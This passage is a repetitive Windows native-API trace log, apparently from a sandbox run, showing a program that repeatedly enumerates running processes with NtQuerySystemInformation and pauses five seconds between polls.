ResultLength=0x0) returned 0x0 [0220.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.353] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.492] NtAllocateVirtualMemory (in: 